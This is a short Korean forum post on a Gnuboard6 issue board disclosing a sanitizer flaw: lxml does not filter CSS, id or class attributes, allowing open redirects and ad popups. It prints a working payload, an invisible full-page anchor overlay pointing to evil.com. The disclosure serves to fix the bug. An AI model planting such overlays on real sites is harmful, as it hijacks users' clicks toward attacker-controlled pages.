CSS, ID, CLASS misconfigure로 인한 취약점 > 그누보드6 이슈

그누보드6 이슈

좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.

CSS, ID, CLASS misconfigure로 인한 취약점 정보

CSS, ID, CLASS misconfigure로 인한 취약점

본문

lxml은 css 및 id, class 부분을 필터링 하지 않기 때문에 이를 조합하면 Open redirect, 광고 사이트 popup 등의 취약점이 발생될 수 있습니다.

영상에서 사용한 페이로드 입니다.

<a href="https://evil.com" class="win_password_lost" style="position:absolute; top:0; left:0; width:100%; height:100%; opacity:0.001; z-index:9999;"> Click me </a>

https://github.com/user-attachments/assets/8b5f5ac9-d4b9-48e8-89e5-8077204f901f

추천
0

댓글 0개

90레벨 이상 댓글을 남길 수 있습니다.

전체 173
그누보드6 이슈 내용 검색

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1402호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT